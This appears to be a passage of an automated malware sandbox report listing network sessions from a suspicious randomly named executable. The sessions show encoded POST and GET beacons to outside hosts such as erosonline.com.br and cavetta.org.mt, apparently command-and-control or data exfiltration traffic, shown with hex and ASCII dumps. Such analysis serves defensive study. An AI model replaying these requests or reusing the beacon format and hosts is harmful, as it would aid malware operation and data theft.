                                                          Data Ascii: .everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.supports.flag,n.DOMReady=!1,n.rea
                                                          Jul 2, 2024 14:05:26.733676910 CEST1236INData Raw: 2d 62 6c 6f 63 6b 2d 63 6f 64 65 7b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 63 63 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 34 70 78 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 4d 65 6e 6c 6f 2c 43 6f 6e 73 6f 6c 61 73 2c 6d 6f 6e
                                                          Data Ascii: -block-code{border:1px solid #ccc;border-radius:4px;font-family:Menlo,Consolas,monaco,monospace;padding:.8em 1em}.wp-block-embed figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-embed figcaption{color:#ffffffa6}.
                                                          Jul 2, 2024 14:05:26.733689070 CEST1236INData Raw: 73 74 79 6c 65 2d 6c 61 72 67 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 2e 69 73 2d 73 74 79 6c 65 2d 70 6c 61 69 6e 7b 62 6f 72 64 65 72 3a 6e 6f 6e 65 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 20 2e 77 70 2d 62 6c 6f 63 6b 2d
                                                          Data Ascii: style-large,.wp-block-quote.is-style-plain{border:none}.wp-block-search .wp-block-search__label{font-weight:700}.wp-block-search__button{border:1px solid #ccc;padding:.375em .625em}:where(.wp-block-group.has-background){padding:1.25em 2.375em}
                                                          Jul 2, 2024 14:05:26.733774900 CEST108INData Raw: 72 61 74 65 64 20 2a 2f 0a 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 5f 5f 6c 69 6e 6b 7b 63 6f 6c 6f 72 3a 23 66 66 66 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a
                                                          Data Ascii: rated */.wp-block-button__link{color:#fff;background-color:#32373c;border-radius:9999px;box-shadow:none;tex
                                                          Jul 2, 2024 14:05:26.733836889 CEST1236INData Raw: 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e 36 36 37 65 6d 20 2b 20 32 70 78 29 20 63 61 6c 63 28 31 2e 33 33 33 65 6d 20 2b 20 32 70 78 29 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 32 35 65 6d
                                                          Data Ascii: t-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-inline-css'>body{--wp--preset--color--black: #0000
                                                          Jul 2, 2024 14:05:26.733848095 CEST1236INData Raw: 32 30 37 2c 34 36 2c 34 36 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 76 65 72 79 2d 6c 69 67 68 74 2d 67 72 61 79 2d 74 6f 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 3a 20 6c 69 6e 65
                                                          Data Ascii: 207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%,rgb(151,12
                                                          Jul 2, 2024 14:05:26.738569975 CEST1236INData Raw: 20 33 36 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 68 75 67 65 3a 20 34 38 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 32 30 3a 20 30 2e 34 34 72 65 6d 3b 2d 2d 77 70 2d
                                                          Data Ascii: 36px;--wp--preset--font-size--huge: 48px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.3


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          40192.168.2.649763135.181.212.20680280C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 2, 2024 14:05:28.296564102 CEST486OUTGET /r7gq/?GBbljTO=J5YXCuAbT0imQyqe16hzUfFFlDgtP40GBYCO3M0UAxiKR6OMc8IU/OmfKBQVi2nAD0slqU03Fjqs2wbSr2/73QjcpJUwGjWcGd039QJH+viAIsBs41Zzvp+05pTyuEBiwTKkz9s=&mB=rL4lP HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Connection: close
                                                          Host: www.bulletinnest.com
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                          Jul 2, 2024 14:05:29.317720890 CEST479INHTTP/1.1 301 Moved Permanently
                                                          Date: Tue, 02 Jul 2024 12:05:28 GMT
                                                          Server: Apache
                                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                          X-Redirect-By: WordPress
                                                          Location: http://bulletinnest.com/r7gq/?GBbljTO=J5YXCuAbT0imQyqe16hzUfFFlDgtP40GBYCO3M0UAxiKR6OMc8IU/OmfKBQVi2nAD0slqU03Fjqs2wbSr2/73QjcpJUwGjWcGd039QJH+viAIsBs41Zzvp+05pTyuEBiwTKkz9s=&mB=rL4lP
                                                          Content-Length: 0
                                                          Connection: close
                                                          Content-Type: text/html; charset=UTF-8


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          41192.168.2.649764191.6.208.13380280C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 2, 2024 14:05:35.166114092 CEST761OUTPOST /2lcx/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Cache-Control: max-age=0
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 212
                                                          Host: www.erosonline.com.br
                                                          Origin: http://www.erosonline.com.br
                                                          Referer: http://www.erosonline.com.br/2lcx/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                          Data Raw: 47 42 62 6c 6a 54 4f 3d 58 32 34 2f 48 75 62 6f 52 4f 58 52 36 68 47 58 4f 6e 2f 48 43 38 37 46 4c 44 31 66 46 31 75 35 77 74 4f 30 7a 69 68 4a 77 6d 36 36 66 51 75 53 32 76 59 39 2f 6f 52 34 6a 2b 4b 64 74 71 61 43 51 5a 51 39 63 39 59 2f 6f 41 63 32 4e 68 74 77 75 35 32 39 62 78 39 59 44 4e 73 59 4a 63 33 6d 56 38 2b 42 6c 51 37 49 46 6b 39 41 37 61 77 73 65 58 36 39 5a 7a 5a 43 36 52 34 37 76 76 51 53 2f 58 77 34 4d 34 38 46 71 55 56 61 39 44 36 46 32 6c 76 42 55 4e 53 37 79 52 2f 41 58 75 49 41 5a 6f 58 51 52 58 6c 48 42 61 4b 2f 34 66 41 42 6b 5a 64 65 4e 66 6c 4e 6c 30 2b 57 35 42 53 45 31 50 49 6f 50 58 76 31 68 42 57 51
                                                          Data Ascii: GBbljTO=X24/HuboROXR6hGXOn/HC87FLD1fF1u5wtO0zihJwm66fQuS2vY9/oR4j+KdtqaCQZQ9c9Y/oAc2Nhtwu529bx9YDNsYJc3mV8+BlQ7IFk9A7awseX69ZzZC6R47vvQS/Xw4M48FqUVa9D6F2lvBUNS7yR/AXuIAZoXQRXlHBaK/4fABkZdeNflNl0+W5BSE1PIoPXv1hBWQ
                                                          Jul 2, 2024 14:05:35.864717007 CEST727INHTTP/1.1 404 Not Found
                                                          Date: Tue, 02 Jul 2024 12:05:35 GMT
                                                          Server: Apache
                                                          Last-Modified: Thu, 24 Oct 2019 19:33:13 GMT
                                                          ETag: "1e8-595ad1aad5040"
                                                          Accept-Ranges: bytes
                                                          Content-Length: 488
                                                          Connection: close
                                                          Content-Type: text/html
                                                          Data Raw: 3c 68 74 6d 6c 3e 0a 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 4c 61 6e 67 75 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 70 74 2d 62 72 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 50 e1 67 69 6e 61 20 4e e3 6f 20 45 6e 63 6f 6e 74 72 61 64 61 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 26 6e 62 73 70 3b 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 26 6e 62 73 70 3b 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 26 6e 62 73 70 3b 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 26 6e 62 73 70 3b 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 3c 62 3e 3c 66 6f 6e 74 [TRUNCATED]
                                                          Data Ascii: <html><head><meta http-equiv="Content-Language" content="pt-br"><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>Pgina No Encontrada</title></head><body><p align="center">&nbsp;</p><p align="center">&nbsp;</p><p align="center">&nbsp;</p><p align="center">&nbsp;</p><p align="center"><b><font face="Arial" size="3">Erro 404</font></b></p><p align="center"><font face="MS Sans Serif" size="2">Pgina no encontrada</font></p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          42192.168.2.649766191.6.208.13380280C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 2, 2024 14:05:37.704380035 CEST785OUTPOST /2lcx/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Cache-Control: max-age=0
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 236
                                                          Host: www.erosonline.com.br
                                                          Origin: http://www.erosonline.com.br
                                                          Referer: http://www.erosonline.com.br/2lcx/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                          Data Raw: 47 42 62 6c 6a 54 4f 3d 58 32 34 2f 48 75 62 6f 52 4f 58 52 38 77 32 58 4c 47 2f 48 44 63 37 4b 4f 44 31 66 50 56 75 39 77 74 53 30 7a 67 4d 55 77 54 71 36 65 31 4b 53 6e 62 45 39 38 6f 52 34 6f 65 4b 42 6a 4b 61 4a 51 5a 64 4f 63 34 67 2f 6f 45 30 32 4e 6b 52 77 75 6f 32 36 62 68 39 61 46 4e 73 67 4e 63 33 6d 56 38 2b 42 6c 51 75 6a 46 6b 6c 41 37 71 41 73 4d 31 53 2b 55 54 5a 4e 74 68 34 37 2b 2f 51 57 2f 58 78 62 4d 37 34 38 71 57 64 61 39 48 32 46 31 30 76 47 62 4e 53 39 76 68 2b 73 61 66 6c 69 66 35 4b 43 62 45 41 69 53 4e 53 45 77 4a 42 62 34 71 64 39 66 50 46 50 6c 32 6d 6b 35 68 53 75 33 50 77 6f 64 41 6a 53 75 31 7a 7a 6d 75 61 37 41 57 49 55 67 30 6f 50 38 57 72 42 52 44 37 73 56 67 3d 3d
                                                          Data Ascii: GBbljTO=X24/HuboROXR8w2XLG/HDc7KOD1fPVu9wtS0zgMUwTq6e1KSnbE98oR4oeKBjKaJQZdOc4g/oE02NkRwuo26bh9aFNsgNc3mV8+BlQujFklA7qAsM1S+UTZNth47+/QW/XxbM748qWda9H2F10vGbNS9vh+saflif5KCbEAiSNSEwJBb4qd9fPFPl2mk5hSu3PwodAjSu1zzmua7AWIUg0oP8WrBRD7sVg==
                                                          Jul 2, 2024 14:05:38.413938999 CEST727INHTTP/1.1 404 Not Found
                                                          Date: Tue, 02 Jul 2024 12:05:38 GMT
                                                          Server: Apache
                                                          Last-Modified: Thu, 24 Oct 2019 19:33:13 GMT
                                                          ETag: "1e8-595ad1aad5040"
                                                          Accept-Ranges: bytes
                                                          Content-Length: 488
                                                          Connection: close
                                                          Content-Type: text/html
                                                          Data Raw: 3c 68 74 6d 6c 3e 0a 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 4c 61 6e 67 75 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 70 74 2d 62 72 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 50 e1 67 69 6e 61 20 4e e3 6f 20 45 6e 63 6f 6e 74 72 61 64 61 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 26 6e 62 73 70 3b 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 26 6e 62 73 70 3b 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 26 6e 62 73 70 3b 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 26 6e 62 73 70 3b 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 3c 62 3e 3c 66 6f 6e 74 [TRUNCATED]
                                                          Data Ascii: <html><head><meta http-equiv="Content-Language" content="pt-br"><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>Pgina No Encontrada</title></head><body><p align="center">&nbsp;</p><p align="center">&nbsp;</p><p align="center">&nbsp;</p><p align="center">&nbsp;</p><p align="center"><b><font face="Arial" size="3">Erro 404</font></b></p><p align="center"><font face="MS Sans Serif" size="2">Pgina no encontrada</font></p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          43192.168.2.649767191.6.208.13380280C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 2, 2024 14:05:40.237003088 CEST1798OUTPOST /2lcx/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Cache-Control: max-age=0
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 1248
                                                          Host: www.erosonline.com.br
                                                          Origin: http://www.erosonline.com.br
                                                          Referer: http://www.erosonline.com.br/2lcx/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                          Data Raw: 47 42 62 6c 6a 54 4f 3d 58 32 34 2f 48 75 62 6f 52 4f 58 52 38 77 32 58 4c 47 2f 48 44 63 37 4b 4f 44 31 66 50 56 75 39 77 74 53 30 7a 67 4d 55 77 51 4b 36 65 47 79 53 31 4d 77 39 39 6f 52 34 32 75 4b 52 6a 4b 61 75 51 5a 56 43 63 35 64 43 6f 43 77 32 58 42 64 77 35 71 65 36 51 68 39 61 48 4e 73 62 4a 63 32 6b 56 38 4f 46 6c 51 2b 6a 46 6b 6c 41 37 6f 49 73 4a 58 36 2b 48 6a 5a 43 36 52 34 33 76 76 51 2b 2f 57 59 67 4d 36 4d 7a 71 6d 39 61 2b 6e 6d 46 35 6d 58 47 45 39 53 2f 2f 78 2b 30 61 66 70 55 66 35 57 47 62 46 6c 48 53 4b 69 45 67 73 31 43 71 70 4e 2f 49 2f 70 55 6d 30 76 42 31 45 61 4a 36 64 42 57 56 53 37 45 73 58 7a 67 2b 4a 66 6c 45 32 4e 78 76 46 74 67 36 57 36 33 51 67 2b 6a 4b 33 4c 37 69 50 59 33 58 67 6c 55 4a 44 6a 56 70 6b 5a 63 32 74 38 6c 36 47 31 58 37 53 56 73 41 2f 5a 33 58 7a 55 36 6f 45 51 6b 44 65 55 36 6b 4b 47 69 54 2b 49 75 79 4d 34 76 6d 67 4b 33 68 41 36 75 4b 31 30 36 4d 71 6b 56 43 78 43 4c 69 4d 2b 36 55 6b 73 2b 4f 51 47 61 6e 4c 75 5a 44 44 57 6a 74 69 47 67 2f 4d [TRUNCATED]
                                                          Data Ascii: GBbljTO=X24/HuboROXR8w2XLG/HDc7KOD1fPVu9wtS0zgMUwQK6eGyS1Mw99oR42uKRjKauQZVCc5dCoCw2XBdw5qe6Qh9aHNsbJc2kV8OFlQ+jFklA7oIsJX6+HjZC6R43vvQ+/WYgM6Mzqm9a+nmF5mXGE9S//x+0afpUf5WGbFlHSKiEgs1CqpN/I/pUm0vB1EaJ6dBWVS7EsXzg+JflE2NxvFtg6W63Qg+jK3L7iPY3XglUJDjVpkZc2t8l6G1X7SVsA/Z3XzU6oEQkDeU6kKGiT+IuyM4vmgK3hA6uK106MqkVCxCLiM+6Uks+OQGanLuZDDWjtiGg/MejaXHpQo6aOH96Sq/zu2kpCSLqxEno1/sHt97Cbu1NMxSfW+AWS99uWLPXDPxfq4H26fzpnGCcwv9/DFfrB9k/NOCErJeshPOTBSFzqp60uLxssfJTvb6ezYNhUfHkAM4cEtiUwkdNI+3ltNGntp60NnmzVnaEcolD+sNaFHuOPY6NPsJZ6iGOReNLjUTur7Z1RxrRZ+Po2vk6oWsTGMzlsbRglNh4pxbuLBiLkisAmau2BIpMo7MnsLhDx7IXcRAIxVbkMurYzKBHhKQWABVp5Yhmdgjcw6eoaDXCh/HZODg6py25AQiRr2QwR97EyePk3aIWRnQieC0lHO1xSGx7luh5kraa4ibsMsdMtMtM0lAu7eizu4Cj3LW3DXSXIIArf81WSkywebg2WRXN4/Bdg7tZjWia+DYfZTFa9dO2LEb5o683Xw1mCVNDfsvGjmNpDaLbj/6+pvJO6+DKa/Hapy3P1B+sQPGIXRfl6A+QDdgJUAa/aVWHQt+DTPXvZnfE/Gyc8ouq2Z1V457U+0nmcD1M91NjrQu81o7DrPjafn6AzWBilFE65uxOhJq088cYjbtbdXM2GcArTYX9zVmuJZ1MM5XcCDZaXUfS2838jLhIFESdHmC2wCVW5VlvEm2eM7URroyI1U4eINY3i9S/BPu9ukO6C7a7 [TRUNCATED]
                                                          Jul 2, 2024 14:05:41.067050934 CEST727INHTTP/1.1 404 Not Found
                                                          Date: Tue, 02 Jul 2024 12:05:40 GMT
                                                          Server: Apache
                                                          Last-Modified: Thu, 24 Oct 2019 19:33:13 GMT
                                                          ETag: "1e8-595ad1aad5040"
                                                          Accept-Ranges: bytes
                                                          Content-Length: 488
                                                          Connection: close
                                                          Content-Type: text/html
                                                          Data Raw: 3c 68 74 6d 6c 3e 0a 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 4c 61 6e 67 75 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 70 74 2d 62 72 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 50 e1 67 69 6e 61 20 4e e3 6f 20 45 6e 63 6f 6e 74 72 61 64 61 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 26 6e 62 73 70 3b 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 26 6e 62 73 70 3b 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 26 6e 62 73 70 3b 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 26 6e 62 73 70 3b 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 3c 62 3e 3c 66 6f 6e 74 [TRUNCATED]
                                                          Data Ascii: <html><head><meta http-equiv="Content-Language" content="pt-br"><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>Pgina No Encontrada</title></head><body><p align="center">&nbsp;</p><p align="center">&nbsp;</p><p align="center">&nbsp;</p><p align="center">&nbsp;</p><p align="center"><b><font face="Arial" size="3">Erro 404</font></b></p><p align="center"><font face="MS Sans Serif" size="2">Pgina no encontrada</font></p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          44192.168.2.649768191.6.208.13380280C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 2, 2024 14:05:42.763941050 CEST487OUTGET /2lcx/?mB=rL4lP&GBbljTO=a0QfEZLGBdPS9CupDmnnPsWDKzErLSGek8yDxBQcwyKMQFiimN077KRHkaCGiYerfpBHWbRAiBI+CxxxyL+dNlx1E9UxGMH9Wp+KkC7SZXFmjq4jPFSCThF16iUos8QU5jw0D9M= HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Connection: close
                                                          Host: www.erosonline.com.br
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                          Jul 2, 2024 14:05:43.468678951 CEST727INHTTP/1.1 404 Not Found
                                                          Date: Tue, 02 Jul 2024 12:05:43 GMT
                                                          Server: Apache
                                                          Last-Modified: Thu, 24 Oct 2019 19:33:13 GMT
                                                          ETag: "1e8-595ad1aad5040"
                                                          Accept-Ranges: bytes
                                                          Content-Length: 488
                                                          Connection: close
                                                          Content-Type: text/html
                                                          Data Raw: 3c 68 74 6d 6c 3e 0a 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 4c 61 6e 67 75 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 70 74 2d 62 72 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 50 e1 67 69 6e 61 20 4e e3 6f 20 45 6e 63 6f 6e 74 72 61 64 61 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 26 6e 62 73 70 3b 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 26 6e 62 73 70 3b 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 26 6e 62 73 70 3b 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 26 6e 62 73 70 3b 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 3c 62 3e 3c 66 6f 6e 74 [TRUNCATED]
                                                          Data Ascii: <html><head><meta http-equiv="Content-Language" content="pt-br"><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>Pgina No Encontrada</title></head><body><p align="center">&nbsp;</p><p align="center">&nbsp;</p><p align="center">&nbsp;</p><p align="center">&nbsp;</p><p align="center"><b><font face="Arial" size="3">Erro 404</font></b></p><p align="center"><font face="MS Sans Serif" size="2">Pgina no encontrada</font></p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          45192.168.2.649769188.114.97.380280C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 2, 2024 14:05:48.583668947 CEST752OUTPOST /yhnb/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Cache-Control: max-age=0
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 212
                                                          Host: www.cavetta.org.mt
                                                          Origin: http://www.cavetta.org.mt
                                                          Referer: http://www.cavetta.org.mt/yhnb/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                          Data Raw: 47 42 62 6c 6a 54 4f 3d 78 34 7a 38 4c 43 4b 33 6f 68 34 35 63 56 72 4f 75 33 2b 4a 66 70 63 39 4d 4b 33 45 6d 67 32 37 6f 66 66 41 4a 61 32 41 4f 6c 2b 53 79 64 74 31 57 79 54 45 73 54 30 57 43 50 78 2f 6e 53 34 51 54 57 6c 50 6a 64 65 54 59 30 50 2b 30 46 71 58 6b 61 33 30 52 45 72 57 43 65 43 6e 51 51 75 42 42 43 69 41 61 66 36 7a 4a 30 69 4c 71 49 30 4f 75 62 71 55 72 4f 43 31 6f 58 73 39 52 4a 30 59 49 32 55 75 75 49 4d 58 56 54 79 70 54 55 48 43 32 7a 54 34 4d 62 41 44 68 4f 69 2b 46 70 65 58 45 49 36 33 30 48 55 58 67 59 61 7a 46 74 4d 32 43 73 74 79 48 4f 55 33 49 32 52 43 63 6c 6e 68 2f 33 57 6c 52 45 68 49 35 6e 70 54
                                                          Data Ascii: GBbljTO=x4z8LCK3oh45cVrOu3+Jfpc9MK3Emg27offAJa2AOl+Sydt1WyTEsT0WCPx/nS4QTWlPjdeTY0P+0FqXka30RErWCeCnQQuBBCiAaf6zJ0iLqI0OubqUrOC1oXs9RJ0YI2UuuIMXVTypTUHC2zT4MbADhOi+FpeXEI630HUXgYazFtM2CstyHOU3I2RCclnh/3WlREhI5npT


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          46192.168.2.649770188.114.97.380280C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 2, 2024 14:05:51.121795893 CEST776OUTPOST /yhnb/ HTTP/1.1
